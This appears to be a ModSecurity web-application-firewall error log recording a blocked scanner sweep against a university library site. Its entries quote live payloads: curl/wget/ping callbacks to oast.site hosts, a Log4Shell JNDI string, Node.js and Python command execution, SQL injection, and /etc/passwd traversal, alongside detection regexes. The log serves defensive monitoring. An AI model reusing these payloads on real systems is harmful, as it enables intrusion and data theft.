[Tue Aug 29 11:33:16.032036 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg7nfrcyahd4guy.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DMCo-f0AAARQ374AAAAB"]
[Tue Aug 29 11:33:18.692131 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlggybpgggf3uknt.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARdiHkAAAAK"]
[Tue Aug 29 11:33:18.995893 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARt-74AAAAV"]
[Tue Aug 29 11:33:19.045166 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARv7PEAAAAY"]
[Tue Aug 29 11:33:19.069627 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARxOpcAAAAa"]
[Tue Aug 29 11:33:19.302672 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARTENQAAAAG"]
[Tue Aug 29 11:33:19.355222 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAAR2Z28AAAAe"]
[Tue Aug 29 11:33:20.329323 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EMCo-f0AAARH7PAAAAAM"]
[Tue Aug 29 11:33:21.338810 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlg4d14sf5azzk3r.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EcCo-f0AAARwurkAAAAZ"]
[Tue Aug 29 11:33:22.448110 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARiDmEAAAAJ"]
[Tue Aug 29 11:33:23.351216 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgzehiu3nymerp7.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11E8Co-f0AAARNk@gAAAAS"]
[Tue Aug 29 11:33:23.394215 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARiDmYAAAAJ"]
[Tue Aug 29 11:33:24.340036 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARfwkkAAAAI"]
[Tue Aug 29 11:33:25.331767 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAANsAe8AAAAD"]
[Tue Aug 29 11:33:25.370869 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARLXwIAAAAQ"]
[Tue Aug 29 11:33:25.373642 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAAQKOkMAAAAs"]
[Tue Aug 29 11:33:26.408880 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgj7mbxc1npyqxg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARu2roAAAAW"]
[Tue Aug 29 11:33:26.471226 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAAQKOkUAAAAs"]
[Tue Aug 29 11:33:27.324902 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAANsAfYAAAAD"]
[Tue Aug 29 11:33:27.327426 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARdiJgAAAAK"]
[Tue Aug 29 11:33:27.368501 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARTEOwAAAAG"]
[Tue Aug 29 11:33:29.349325 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARt-9kAAAAV"]
[Tue Aug 29 11:33:29.352815 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilib.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARt-9kAAAAV"]
[Tue Aug 29 11:33:29.368813 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARA7hAAAAAA"]
[Tue Aug 29 11:33:32.049547 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARLXyAAAAAQ"]
[Tue Aug 29 11:33:32.111596 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgjsqr3jtnzfoth.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARv7SgAAAAY"]
[Tue Aug 29 11:33:32.341311 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARv7S4AAAAY"]
[Tue Aug 29 11:33:34.370639 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARnmKAAAAAR"]
[Tue Aug 29 11:33:35.343231 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASAHaMAAAAH"]
[Tue Aug 29 11:33:35.383103 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAASAHaUAAAAH"]
